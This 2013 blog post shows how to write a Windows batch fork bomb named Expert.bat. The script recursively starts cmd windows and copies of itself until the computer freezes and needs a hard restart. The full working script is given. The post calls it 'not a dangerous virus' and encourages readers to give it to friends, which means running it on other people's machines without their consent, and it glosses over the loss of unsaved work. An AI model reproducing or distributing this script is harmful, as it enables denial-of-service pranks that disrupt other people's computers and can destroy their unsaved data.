Wednesday 28 August 2013

How to freeze computer(s) in seconds

Today we are going to show you a few lines of batch scripting which can freeze or crash your PC in just a matter of seconds. But before going on to the we will explain how the program works.


First of all when you open the batch file it will go into an infinite loop. Inside the loop the batch file will do two things. First it will open three cmd windows which will remain but will take up RAM space. Second the batch file will open itself three times meaning the batch file will create extra three sessions of itself.


These three sessions will continue on the same loop which will open it self again and again thus creating a great infinite web of cmd sessions. In just a few SECONDS after opening the batch file your PC will freeze. There is no time to use the task manager to another tool to kill the processes. The only way is using the restart button on your CPU to restart the PC.


To make the batch file paste the following code into notepad and save as a Expert.bat EXACTLY. Do not name it anything else.


ECHO OFF

:START

START & START & START

Expert.bat

Expert.bat

Expert.bat

GOTO START

By the way this is not a dangerous virus so you can try it on your PC and give it to your friends. Stay tuned for more great posts and remember to leave your ratings and comments. Like our Facebook page and remember to subscribe to the blog.


0 comments:

Post a Comment